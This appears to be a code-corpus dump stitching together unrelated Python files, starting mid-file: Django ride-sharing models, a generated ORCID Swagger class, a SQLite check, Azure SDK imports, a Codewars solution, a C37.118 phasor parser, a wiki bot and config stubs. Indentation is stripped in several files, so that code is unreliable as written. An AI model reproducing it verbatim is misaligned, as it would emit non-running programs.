choices = (('Male', 'Male'), ('Female', 'Female'), ('Both', 'Both'))
sex = models.CharField(_('gender preference'), max_length=30, blank=False, choices=choices)
user = models.ForeignKey(CustomUser, on_delete=models.CASCADE)
vehicle = models.ForeignKey(Vehicle, on_delete=models.CASCADE)
ended = models.BooleanField(_('sharing ended'), default=False)
def __str__(self):
return self.start + " to " + self.dest
def get_user(self):
return self.user
def get_absolute_url(self):
return "/app/sharing/%d/view" % self.pk
class Request(models.Model):
pick = models.CharField(_('pick up point'), max_length=256, blank=False, )
dest = models.CharField(_('destination'), max_length=256, blank=False)
reg_date = models.DateTimeField(_('registration date'), default=timezone.now)
user = models.ForeignKey(CustomUser, on_delete=models.CASCADE)
bearable = models.IntegerField(_('bearable cost'), blank=False)
status = models.CharField(_('status'), max_length=256, blank=False, default='pending')
ride = models.ForeignKey(VehicleSharing, on_delete=models.CASCADE)
def __str__(self):
return "request from " + self.user.get_full_name() + " on " + self.reg_date.isoformat(' ')[0:16]
def get_absolute_url(self):
return "/app/request/%d/view" % self.pk
class Message(models.Model):
sender = models.ForeignKey(CustomUser, related_name='sender', on_delete=models.CASCADE)
recipient = models.ForeignKey(CustomUser, related_name='recipient', on_delete=models.CASCADE)
subject = models.CharField(default='(No Subject)', max_length=256)
message = models.TextField(blank=False)
date = models.DateTimeField(_('time sent'), default=timezone.now)
read = models.BooleanField(_('read'), default=False)
deleted = models.BooleanField(_('deleted'), default=False)
def __str__(self):
return self.sender.username + ' to ' + self.recipient.username + ' - ' + self.message[0:20] + '...'
def url(self):
return '/app/user/dashboard/messages/%d/read/' % self.pk
    def send(self, user, recipient, subject, message):
        # Use a distinct local name so the ``message`` argument is not shadowed
        # by the newly created instance (the original code overwrote it).
        msg = Message()
        msg.sender = user
        msg.recipient = recipient
        msg.subject = subject
        msg.message = message
        msg.save()
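    # Hedged usage sketch (hypothetical view code; both users are existing
    # CustomUser instances already saved in the database):
    #   Message().send(user=request.user, recipient=other_user,
    #                  subject='Ride request', message='Is the 9am seat free?')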
class Follow(models.Model):
follower = models.ForeignKey(CustomUser, related_name='follower', on_delete=models.CASCADE, default=None)
followee = models.ForeignKey(CustomUser, related_name='followee', on_delete=models.CASCADE, default=None)
time = models.DateTimeField(_('time'), default=timezone.now)
def __unicode__(self):
return str(self.follower) + ' follows ' + str(self.followee)
def __str__(self):
return str(self.follower) + ' follows ' + str(self.followee)
    def is_follows(self, user_1, user_2):
        # Follow has no ``user`` field; filter on followee/follower instead.
        foll = Follow.objects.filter(followee=user_1, follower=user_2)
        if foll.exists():
            return True
        else:
            return False
def get_absolute_url(self):
return "/app/profile/%s" % self.follower.username
class Profile(models.Model):
user = models.OneToOneField(CustomUser, related_name='profile', on_delete=models.CASCADE, unique=True)
picture = models.FileField(blank=True, default='user.png')
education = models.TextField(blank=True)
work = models.TextField(blank=True)
social_facebook = models.CharField(max_length=256, blank=True)
social_twitter = models.CharField(max_length=256, blank=True)
social_instagram = models.CharField(max_length=256, blank=True)
bio = models.TextField(blank=True)
is_public = models.BooleanField(default=False)
def __str__(self):
return self.user.username
class DriverInfo(models.Model):
driver = models.OneToOneField(CustomUser, on_delete=models.CASCADE)
liscence_no = models.CharField(_('liscence number'), max_length=30, blank=False)
date_issuance = models.DateField(_('date of first issuance'), blank=True)
scanned = models.ImageField(_('picture of driver\'s liscence'), blank=True)
confirmed = models.BooleanField(_('confirmed'), default=False)
| othreecodes/MY-RIDE | app/models.py | Python | mit | 11,305 |
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.created_date_v30 import CreatedDateV30 # noqa: F401,E501
from orcid_api_v3.models.external_i_ds_v30 import ExternalIDsV30 # noqa: F401,E501
from orcid_api_v3.models.fuzzy_date_v30 import FuzzyDateV30 # noqa: F401,E501
from orcid_api_v3.models.last_modified_date_v30 import LastModifiedDateV30 # noqa: F401,E501
from orcid_api_v3.models.organization_v30 import OrganizationV30 # noqa: F401,E501
from orcid_api_v3.models.source_v30 import SourceV30 # noqa: F401,E501
from orcid_api_v3.models.url_v30 import UrlV30 # noqa: F401,E501
class EducationSummaryV30(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'created_date': 'CreatedDateV30',
'last_modified_date': 'LastModifiedDateV30',
'source': 'SourceV30',
'put_code': 'int',
'department_name': 'str',
'role_title': 'str',
'start_date': 'FuzzyDateV30',
'end_date': 'FuzzyDateV30',
'organization': 'OrganizationV30',
'url': 'UrlV30',
'external_ids': 'ExternalIDsV30',
'display_index': 'str',
'visibility': 'str',
'path': 'str'
}
attribute_map = {
'created_date': 'created-date',
'last_modified_date': 'last-modified-date',
'source': 'source',
'put_code': 'put-code',
'department_name': 'department-name',
'role_title': 'role-title',
'start_date': 'start-date',
'end_date': 'end-date',
'organization': 'organization',
'url': 'url',
'external_ids': 'external-ids',
'display_index': 'display-index',
'visibility': 'visibility',
'path': 'path'
}
def __init__(self, created_date=None, last_modified_date=None, source=None, put_code=None, department_name=None, role_title=None, start_date=None, end_date=None, organization=None, url=None, external_ids=None, display_index=None, visibility=None, path=None): # noqa: E501
"""EducationSummaryV30 - a model defined in Swagger""" # noqa: E501
self._created_date = None
self._last_modified_date = None
self._source = None
self._put_code = None
self._department_name = None
self._role_title = None
self._start_date = None
self._end_date = None
self._organization = None
self._url = None
self._external_ids = None
self._display_index = None
self._visibility = None
self._path = None
self.discriminator = None
if created_date is not None:
self.created_date = created_date
if last_modified_date is not None:
self.last_modified_date = last_modified_date
if source is not None:
self.source = source
if put_code is not None:
self.put_code = put_code
if department_name is not None:
self.department_name = department_name
if role_title is not None:
self.role_title = role_title
if start_date is not None:
self.start_date = start_date
if end_date is not None:
self.end_date = end_date
if organization is not None:
self.organization = organization
if url is not None:
self.url = url
if external_ids is not None:
self.external_ids = external_ids
if display_index is not None:
self.display_index = display_index
if visibility is not None:
self.visibility = visibility
if path is not None:
self.path = path
@property
def created_date(self):
"""Gets the created_date of this EducationSummaryV30. # noqa: E501
:return: The created_date of this EducationSummaryV30. # noqa: E501
:rtype: CreatedDateV30
"""
return self._created_date
@created_date.setter
def created_date(self, created_date):
"""Sets the created_date of this EducationSummaryV30.
:param created_date: The created_date of this EducationSummaryV30. # noqa: E501
:type: CreatedDateV30
"""
self._created_date = created_date
@property
def last_modified_date(self):
"""Gets the last_modified_date of this EducationSummaryV30. # noqa: E501
:return: The last_modified_date of this EducationSummaryV30. # noqa: E501
:rtype: LastModifiedDateV30
"""
return self._last_modified_date
@last_modified_date.setter
def last_modified_date(self, last_modified_date):
"""Sets the last_modified_date of this EducationSummaryV30.
:param last_modified_date: The last_modified_date of this EducationSummaryV30. # noqa: E501
:type: LastModifiedDateV30
"""
self._last_modified_date = last_modified_date
@property
def source(self):
"""Gets the source of this EducationSummaryV30. # noqa: E501
:return: The source of this EducationSummaryV30. # noqa: E501
:rtype: SourceV30
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this EducationSummaryV30.
:param source: The source of this EducationSummaryV30. # noqa: E501
:type: SourceV30
"""
self._source = source
@property
def put_code(self):
"""Gets the put_code of this EducationSummaryV30. # noqa: E501
:return: The put_code of this EducationSummaryV30. # noqa: E501
:rtype: int
"""
return self._put_code
@put_code.setter
def put_code(self, put_code):
"""Sets the put_code of this EducationSummaryV30.
:param put_code: The put_code of this EducationSummaryV30. # noqa: E501
:type: int
"""
self._put_code = put_code
@property
def department_name(self):
"""Gets the department_name of this EducationSummaryV30. # noqa: E501
:return: The department_name of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._department_name
@department_name.setter
def department_name(self, department_name):
"""Sets the department_name of this EducationSummaryV30.
:param department_name: The department_name of this EducationSummaryV30. # noqa: E501
:type: str
"""
self._department_name = department_name
@property
def role_title(self):
"""Gets the role_title of this EducationSummaryV30. # noqa: E501
:return: The role_title of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._role_title
@role_title.setter
def role_title(self, role_title):
"""Sets the role_title of this EducationSummaryV30.
:param role_title: The role_title of this EducationSummaryV30. # noqa: E501
:type: str
"""
self._role_title = role_title
@property
def start_date(self):
"""Gets the start_date of this EducationSummaryV30. # noqa: E501
:return: The start_date of this EducationSummaryV30. # noqa: E501
:rtype: FuzzyDateV30
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this EducationSummaryV30.
:param start_date: The start_date of this EducationSummaryV30. # noqa: E501
:type: FuzzyDateV30
"""
self._start_date = start_date
@property
def end_date(self):
"""Gets the end_date of this EducationSummaryV30. # noqa: E501
:return: The end_date of this EducationSummaryV30. # noqa: E501
:rtype: FuzzyDateV30
"""
return self._end_date
@end_date.setter
def end_date(self, end_date):
"""Sets the end_date of this EducationSummaryV30.
:param end_date: The end_date of this EducationSummaryV30. # noqa: E501
:type: FuzzyDateV30
"""
self._end_date = end_date
@property
def organization(self):
"""Gets the organization of this EducationSummaryV30. # noqa: E501
:return: The organization of this EducationSummaryV30. # noqa: E501
:rtype: OrganizationV30
"""
return self._organization
@organization.setter
def organization(self, organization):
"""Sets the organization of this EducationSummaryV30.
:param organization: The organization of this EducationSummaryV30. # noqa: E501
:type: OrganizationV30
"""
self._organization = organization
@property
def url(self):
"""Gets the url of this EducationSummaryV30. # noqa: E501
:return: The url of this EducationSummaryV30. # noqa: E501
:rtype: UrlV30
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this EducationSummaryV30.
:param url: The url of this EducationSummaryV30. # noqa: E501
:type: UrlV30
"""
self._url = url
@property
def external_ids(self):
"""Gets the external_ids of this EducationSummaryV30. # noqa: E501
:return: The external_ids of this EducationSummaryV30. # noqa: E501
:rtype: ExternalIDsV30
"""
return self._external_ids
@external_ids.setter
def external_ids(self, external_ids):
"""Sets the external_ids of this EducationSummaryV30.
:param external_ids: The external_ids of this EducationSummaryV30. # noqa: E501
:type: ExternalIDsV30
"""
self._external_ids = external_ids
@property
def display_index(self):
"""Gets the display_index of this EducationSummaryV30. # noqa: E501
:return: The display_index of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._display_index
@display_index.setter
def display_index(self, display_index):
"""Sets the display_index of this EducationSummaryV30.
:param display_index: The display_index of this EducationSummaryV30. # noqa: E501
:type: str
"""
self._display_index = display_index
@property
def visibility(self):
"""Gets the visibility of this EducationSummaryV30. # noqa: E501
:return: The visibility of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._visibility
@visibility.setter
def visibility(self, visibility):
"""Sets the visibility of this EducationSummaryV30.
:param visibility: The visibility of this EducationSummaryV30. # noqa: E501
:type: str
"""
allowed_values = ["LIMITED", "REGISTERED_ONLY", "PUBLIC", "PRIVATE"] # noqa: E501
if visibility not in allowed_values:
raise ValueError(
"Invalid value for `visibility` ({0}), must be one of {1}" # noqa: E501
.format(visibility, allowed_values)
)
self._visibility = visibility
@property
def path(self):
"""Gets the path of this EducationSummaryV30. # noqa: E501
:return: The path of this EducationSummaryV30. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this EducationSummaryV30.
:param path: The path of this EducationSummaryV30. # noqa: E501
:type: str
"""
self._path = path
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(EducationSummaryV30, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, EducationSummaryV30):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| Royal-Society-of-New-Zealand/NZ-ORCID-Hub | orcid_api_v3/models/education_summary_v30.py | Python | mit | 13,754 |
# Script Name : sqlite_check.py
# Author : Craig Richards
# Created : 20 May 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Runs checks to check my SQLITE database
import sqlite3 as lite
import sys
import os
dropbox = os.getenv("dropbox")
dbfile = ("Databases\jarvis.db")
master_db = os.path.join(dropbox, dbfile)
con = None
try:
    con = lite.connect(master_db)
    cur = con.cursor()
    cur.execute('SELECT SQLITE_VERSION()')
    data = cur.fetchone()
    print("SQLite version: %s" % data)
except lite.Error as e:
    print("Error %s:" % e.args[0])
    sys.exit(1)
finally:
    if con:
        con.close()
con = lite.connect(master_db)
cur = con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
rows = cur.fetchall()
for row in rows:
    print(row)
con = lite.connect(master_db)
cur = con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table'")
while True:
    row = cur.fetchone()
    if row is None:
        break
    print(row[0])
| areriff/pythonlearncanvas | Python Script Sample/sqlite_check.py | Python | mit | 1,034 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
try:
from ._models_py3 import DetectedLanguage
from ._models_py3 import DocumentEntities
from ._models_py3 import DocumentError
from ._models_py3 import DocumentKeyPhrases
from ._models_py3 import DocumentLanguage
from ._models_py3 import DocumentLinkedEntities
from ._models_py3 import DocumentSentiment
from ._models_py3 import DocumentStatistics
from ._models_py3 import EntitiesResult
from ._models_py3 import Entity
from ._models_py3 import EntityLinkingResult
from ._models_py3 import ErrorResponse
from ._models_py3 import InnerError
from ._models_py3 import KeyPhraseResult
from ._models_py3 import LanguageBatchInput
from ._models_py3 import LanguageInput
from ._models_py3 import LanguageResult
from ._models_py3 import LinkedEntity
from ._models_py3 import Match
from ._models_py3 import MultiLanguageBatchInput
from ._models_py3 import MultiLanguageInput
from ._models_py3 import RequestStatistics
from ._models_py3 import SentenceSentiment
from ._models_py3 import SentimentConfidenceScorePerLabel
from ._models_py3 import SentimentResponse
from ._models_py3 import TextAnalyticsError
from ._models_py3 import TextAnalyticsWarning
except (SyntaxError, ImportError):
from ._models import DetectedLanguage # type: ignore
from ._models import DocumentEntities # type: ignore
from ._models import DocumentError # type: ignore
from ._models import DocumentKeyPhrases # type: ignore
from ._models import DocumentLanguage # type: ignore
from ._models import DocumentLinkedEntities # type: ignore
from ._models import DocumentSentiment # type: ignore
from ._models import DocumentStatistics # type: ignore
from ._models import EntitiesResult # type: ignore
from ._models import Entity # type: ignore
from ._models import EntityLinkingResult # type: ignore
from ._models import ErrorResponse # type: ignore
from ._models import InnerError # type: ignore
from ._models import KeyPhraseResult # type: ignore
from ._models import LanguageBatchInput # type: ignore
from ._models import LanguageInput # type: ignore
from ._models import LanguageResult # type: ignore
from ._models import LinkedEntity # type: ignore
from ._models import Match # type: ignore
from ._models import MultiLanguageBatchInput # type: ignore
from ._models import MultiLanguageInput # type: ignore
from ._models import RequestStatistics # type: ignore
from ._models import SentenceSentiment # type: ignore
from ._models import SentimentConfidenceScorePerLabel # type: ignore
from ._models import SentimentResponse # type: ignore
from ._models import TextAnalyticsError # type: ignore
from ._models import TextAnalyticsWarning # type: ignore
from ._text_analytics_client_enums import (
DocumentSentimentValue,
ErrorCodeValue,
InnerErrorCodeValue,
SentenceSentimentValue,
WarningCodeValue,
)
__all__ = [
'DetectedLanguage',
'DocumentEntities',
'DocumentError',
'DocumentKeyPhrases',
'DocumentLanguage',
'DocumentLinkedEntities',
'DocumentSentiment',
'DocumentStatistics',
'EntitiesResult',
'Entity',
'EntityLinkingResult',
'ErrorResponse',
'InnerError',
'KeyPhraseResult',
'LanguageBatchInput',
'LanguageInput',
'LanguageResult',
'LinkedEntity',
'Match',
'MultiLanguageBatchInput',
'MultiLanguageInput',
'RequestStatistics',
'SentenceSentiment',
'SentimentConfidenceScorePerLabel',
'SentimentResponse',
'TextAnalyticsError',
'TextAnalyticsWarning',
'DocumentSentimentValue',
'ErrorCodeValue',
'InnerErrorCodeValue',
'SentenceSentimentValue',
'WarningCodeValue',
]
| Azure/azure-sdk-for-python | sdk/textanalytics/azure-ai-textanalytics/azure/ai/textanalytics/_generated/v3_0/models/__init__.py | Python | mit | 4,297 |
#Kunal Gautam
#Codewars : @Kunalpod
#Problem name: Mexican Wave
#Problem level: 6 kyu
def wave(s):
    # Return every variant of s with exactly one character upper-cased, skipping
    # positions (such as spaces) where upper-casing changes nothing.
    li = []
    for i in range(len(s)):
        x = list(s)
        x[i] = x[i].upper()
        li.append(''.join(x))
    return [x for x in li if x != s]
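# Hedged usage sketch, assuming only the wave() function defined above.
if __name__ == "__main__":
    # Each element upper-cases exactly one alphabetic position of the input.
    print(wave("hello"))  # ['Hello', 'hEllo', 'heLlo', 'helLo', 'hellO']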
| Kunalpod/codewars | mexican_wave.py | Python | mit | 255 |
# This is modified from a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
import array
import struct
import zlib
from enum import Enum
from pkg_resources import parse_version
from kaitaistruct import __version__ as ks_version, KaitaiStruct, KaitaiStream, BytesIO
if parse_version(ks_version) < parse_version('0.7'):
raise Exception(
"Incompatible Kaitai Struct Python API: 0.7 or later is required, but you have %s" % (ks_version))
from .cfg_2 import Cfg2
from .header import Header
from .data import Data
from .cfg_3 import Cfg3
from .command import Command
def _kaitai_repr(self):
_repr_list = []
for item in vars(self):
if not item.startswith('_'):
_r = getattr(self, item)
if type(_r) in (int, float, str, bytes, bool):
_repr_list.append("=".join((item, _r.__repr__())))
else:
_repr_list.append(item)
return "<" + self.__class__.__name__ + " |" + ", ".join(_repr_list) + ">"
def _enum_repr(self):
_repr_list = []
for item in ("name", "value"):
_r = getattr(self, item)
_repr_list.append("=".join((item, _r.__repr__())))
return "<" + self.__class__.__name__[:-4] + " |" + ", ".join(_repr_list) + ">"
def _kaitai_show(self, parent_path=' '):
if type(self) in (int, float, str, bytes, bool):
print(" == ".join((parent_path, self.__repr__())))
elif type(self) == list:
for i, item in enumerate(self):
try:
item.show('{}[{}]'.format(parent_path,i))
except:
_kaitai_show(item,'{}[{}]'.format(parent_path,i))
else:
for item in sorted(vars(self)):
if not item.startswith('_'):
_r = getattr(self, item)
try:
_r.show(parent_path+'.'+item)
except:
_kaitai_show(_r,parent_path+'.'+item)
def _enum_show(self, parent_path=' '):
for item in ("name", "value"):
_r = getattr(self, item)
print(parent_path+'.'+item+' == '+_r.__repr__())
KaitaiStruct.__repr__ = _kaitai_repr
Enum.__repr__ = _enum_repr
KaitaiStruct.show = _kaitai_show
Enum.show = _enum_show
#msg.show()
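# Hedged usage sketch (the names raw_frame and mini_cfgs are assumptions, not taken
# from this file): the monkey-patched helpers above give a readable dump of any
# parsed object, e.g.
#   msg = PhasorMessage(KaitaiStream(BytesIO(raw_frame)), _mini_cfgs=mini_cfgs)
#   msg.show()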
class PhasorMessage(KaitaiStruct):
def __repr__(self):
_repr_list = [
"time=" + str(self.time)] if self.fracsec.fraction_of_second else []
for item in vars(self):
if not item.startswith('_'):
_r = getattr(self, item)
if type(_r) in (int, float, str, bytes):
_repr_list.append("=".join((item, _r.__repr__())))
else:
_repr_list.append(item)
return "<" + self.__class__.__name__ + " |" + ", ".join(_repr_list) + ">"
def show(self, parent_path=' '):
if self.fracsec.fraction_of_second:
print(parent_path+'.time == '+str(self.time))
_kaitai_show(self, parent_path)
def __init__(self, _io, _parent=None, _root=None, _mini_cfgs=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._pkt_pos = self._io.pos()
self.sync = self._root.SyncWord(self._io, self, self._root)
self.framesize = self._io.read_u2be()
self.idcode = self._io.read_u2be()
self._mini_cfg = _mini_cfgs.mini_cfg[self.idcode]
self.soc = self._io.read_u4be()
self.fracsec = self._root.Fracsec(self._io, self, self._root,
self._mini_cfg.time_base.time_base if self._mini_cfg else None)
_on = self.sync.frame_type.value
if _on == 0:
if self._mini_cfg:
self.data = Data(self._io, _mini_cfg=self._mini_cfg)
else:
self.data = self._io.read_bytes((self.framesize - 16))
elif _on == 3:
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Cfg2(io)
_mini_cfgs.add_cfg(self.idcode, self.data)
elif _on == 4:
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Command(io)
elif _on == 5:
_mini_cfgs.add_cfg(self.raw_pkt)
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Cfg3(io)
elif _on == 2:
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Cfg2(io)
elif _on == 1:
self._raw_data = self._io.read_bytes((self.framesize - 16))
io = KaitaiStream(BytesIO(self._raw_data))
self.data = Header(io)
self.chk = self._io.read_u2be()
class SyncWord(KaitaiStruct):
class FrameTypeEnum(Enum):
data = 0
header = 1
cfg1 = 2
cfg2 = 3
cmd = 4
cfg3 = 5
class VersionNumberEnum(Enum):
c_37_118_2005 = 1
c_37_118_2_2011 = 2
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.magic = self._io.ensure_fixed_contents(struct.pack('1b', -86))
self.reserved = self._io.read_bits_int(1) != 0
self.frame_type = self._root.SyncWord.FrameTypeEnum(
self._io.read_bits_int(3))
self.version_number = self._root.SyncWord.VersionNumberEnum(
self._io.read_bits_int(4))
class Fracsec(KaitaiStruct):
def __repr__(self):
_repr_list = ["fraction_of_second=" +
str(self.fraction_of_second)] if self.fraction_of_second else []
for item in vars(self):
if not item.startswith('_'):
_r = getattr(self, item)
if type(_r) in (int, float, str):
_repr_list.append("=".join((item, _r.__repr__())))
else:
_repr_list.append(item)
return "<" + self.__class__.__name__ + " |" + ", ".join(_repr_list) + ">"
def show(self, parent_path):
if self.fraction_of_second:
print(parent_path+'.fraction_of_second == ' + str(self.fraction_of_second))
_kaitai_show(self, parent_path)
class LeapSecondDirectionEnum(Enum):
add = 0
delete = 1
class MsgTqEnum(Enum):
normal_operation_clock_locked_to_utc_traceable_source = 0
time_within_10_to_9_s_of_utc = 1
time_within_10_to_8_s_of_utc = 2
time_within_10_to_7_s_of_utc = 3
time_within_10_to_6_s_of_utc = 4
time_within_10_to_5_s_of_utc = 5
time_within_10_to_4_s_of_utc = 6
time_within_10_to_3_s_of_utc = 7
time_within_10_to_2_s_of_utc = 8
time_within_10_to_1_s_of_utc = 9
time_within_1_s_of_utc = 10
time_within_10_s_of_utc = 11
fault_clock_failure_time_not_reliable = 15
def __init__(self, _io, _parent=None, _root=None, _time_base=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._time_base = _time_base
self.reserved = self._io.read_bits_int(1) != 0
self.leap_second_direction = self._root.Fracsec.LeapSecondDirectionEnum(
self._io.read_bits_int(1))
self.leap_second_occurred = self._io.read_bits_int(1) != 0
self.leap_second_pending = self._io.read_bits_int(1) != 0
self.time_quality = self._root.Fracsec.MsgTqEnum(
self._io.read_bits_int(4))
self.raw_fraction_of_second = self._io.read_bits_int(24)
@property
def fraction_of_second(self):
if hasattr(self, '_m_fraction_of_second'):
return self._m_fraction_of_second if hasattr(self, '_m_fraction_of_second') else None
if self._time_base:
self._m_fraction_of_second = self.raw_fraction_of_second / self._time_base
return self._m_fraction_of_second if hasattr(self, '_m_fraction_of_second') else None
@property
def time(self):
if hasattr(self, '_m_time'):
return self._m_time if hasattr(self, '_m_time') else None
self._m_time = self.soc + self.fracsec.fraction_of_second
return self._m_time if hasattr(self, '_m_time') else None
@property
def chk_body(self):
if hasattr(self, '_m_chk_body'):
return self._m_chk_body if hasattr(self, '_m_chk_body') else None
_pos = self._io.pos()
self._io.seek(0)
self._m_chk_body = self._io.read_bytes((self.framesize - 2))
self._io.seek(_pos)
return self._m_chk_body if hasattr(self, '_m_chk_body') else None
@property
def raw_pkt(self):
if hasattr(self, '_m_pkt'):
return self._m_pkt if hasattr(self, '_m_pkt') else None
_pos = self._io.pos()
self._io.seek(self._pkt_pos)
self._m_pkt = self._io.read_bytes(self.framesize)
self._io.seek(_pos)
return self._m_pkt if hasattr(self, '_m_pkt') else None
| sonusz/PhasorToolBox | phasortoolbox/parser/common.py | Python | mit | 9,531 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This bot regenerates the page VEIDs
The following parameters are supported:
-debug If given, doesn't do any real changes, but only shows
what would have been changed.
"""
__version__ = '$Id: basic.py 4946 2008-01-29 14:58:25Z wikipedian $'
import wikipedia
import pagegenerators, catlib, re, socket, sys
from iplib import CIDR, IPv4Address
class IpNetworkBot:
def __init__(self, nets_generator, debug):
"""
Constructor. Parameters:
* generator - The page generator that determines on which pages
to work on.
* debug - If True, doesn't do any real changes, but only shows
what would have been changed.
"""
self.nets_generator = nets_generator
self.nets = dict()
self.debug = debug
def registerIpNet(self, page):
if ":" in page.title(): return
text = page.get()
in_ipnettpl = False
private = False
for line in text.split("\n"):
if line.startswith("{{IPNetwork"):
in_ipnettpl = True
continue
if line.startswith("}}"):
in_ipnettpl = False
continue
if in_ipnettpl:
if line.startswith("|PRIVATE=1"):
private = True
if not private:
print page.title()
def run(self):
print "# generated by netlist.py"
for page in self.nets_generator:
self.registerIpNet(page)
def main():
# The generator gives the pages that should be worked upon.
gen = None
# If debug is True, doesn't do any real changes, but only show
# what would have been changed.
debug = False
wantHelp = False
# Parse command line arguments
for arg in wikipedia.handleArgs():
if arg.startswith("-debug"):
debug = True
else:
wantHelp = True
if not wantHelp:
# The preloading generator is responsible for downloading multiple
# pages from the wiki simultaneously.
cat = catlib.Category(wikipedia.getSite(), 'Category:%s' % 'IP-Network')
nets_gen = pagegenerators.CategorizedPageGenerator(cat, start = None, recurse = False)
nets_gen = pagegenerators.PreloadingGenerator(nets_gen)
bot = IpNetworkBot(nets_gen, debug)
bot.run()
else:
wikipedia.showHelp()
if __name__ == "__main__":
try:
main()
finally:
wikipedia.stopme()
| sicekit/sicekit | robots/tool-list_networks.py | Python | mit | 2,437 |
def goodSegement1(badList,l,r):
    # Scans the sorted bad values inside [l, r] and tracks the largest gap between
    # consecutive ones (using l, and r where applicable, as boundaries); the value
    # printed at the end (maxVal - 1) is the longest "good" segment length.
    sortedBadList = sorted(badList)
    current = sortedBadList[0]
    maxVal = 0
for i in range(len(sortedBadList)):
current = sortedBadList[i]
maxIndex = i+1
# first value
if i == 0 and l<=current<=r:
val = current - l
prev = l
print("first index value")
print("prev, current : ",prev,current)
if(val>maxVal):
maxVal = val
print("1. (s,e)",l,current)
# other middle values
elif l<=current<=r:
prev = sortedBadList[i-1]
val = current - prev
print("prev, current : ",prev,current)
if(val>maxVal):
maxVal = val
print("2. (s,e)",prev,current)
# last value
if maxIndex == len(sortedBadList) and l<=current<=r:
print("last index value")
next = r
val = next - current
if(val>maxVal):
maxVal = val
print("3. (s,e)",current,next)
print("maxVal:",maxVal-1)
pass
goodSegement1([2,5,8,10,3],1,12)
goodSegement1([37,7,22,15,49,60],3,48)
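# Hedged alternative sketch (my own compact reformulation, not part of the original
# file): treat l and r as virtual boundaries around the sorted in-range bad values
# and take the largest gap minus one as the longest good segment length.
def good_segment_max_len(bad_list, l, r):
    points = [l] + sorted(v for v in bad_list if l <= v <= r) + [r]
    return max(b - a for a, b in zip(points, points[1:])) - 1
print(good_segment_max_len([2, 5, 8, 10, 3], 1, 12))          # 2, matches the value printed above
print(good_segment_max_len([37, 7, 22, 15, 49, 60], 3, 48))   # 14, matches the value printed above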
| nithincvpoyyil/nithincvpoyyil.github.io | test.py | Python | mit | 1,191 |
import sublime, sublime_plugin
from indenttxt import indentparser
class IndentToList(sublime_plugin.TextCommand):
def run(self, edit):
parser = indentparser.IndentTxtParser()
#Get current selection
sels = self.view.sel()
selsParsed = 0
if(len(sels) > 0):
for sel in sels:
#Make sure selection isn't just a cursor
if(abs(sel.b - sel.a) > 0):
self.parseRegion(parser, sel, edit)
selsParsed += 1
#All selections just cursor marks?
if(selsParsed == 0):
region = sublime.Region(0, self.view.size() - 1)
self.parseRegion(parser, region, edit)
def parseRegion(self, parser, region, edit):
lines = self.view.line(region)
text = self.view.substr(lines)
indented = parser.parseText(text)
newview = self.view.window().new_file()
newview.insert(edit, 0, indented)
| Harrison-M/indent.txt-sublime | indentsublime.py | Python | mit | 967 |
def Setup(Settings,DefaultModel):
# set1-test_of_models_against_datasets/osm299.py
Settings["experiment_name"] = "set1_Mix_model_versus_datasets_299px"
Settings["graph_histories"] = ['together'] #['all','together',[],[1,0],[0,0,0],[]]
# 5556x_minlen30_640px 5556x_minlen20_640px 5556x_reslen20_299px 5556x_reslen30_299px
n=0
Settings["models"][n]["dataset_name"] = "5556x_reslen30_299px"
Settings["models"][n]["dump_file_override"] = 'SegmentsData_marked_R100_4Tables.dump'
Settings["models"][n]["pixels"] = 299
Settings["models"][n]["model_type"] = 'img_osm_mix'
Settings["models"][n]["unique_id"] = 'mix_minlen30_299px'
Settings["models"][n]["top_repeat_FC_block"] = 2
Settings["models"][n]["epochs"] = 800
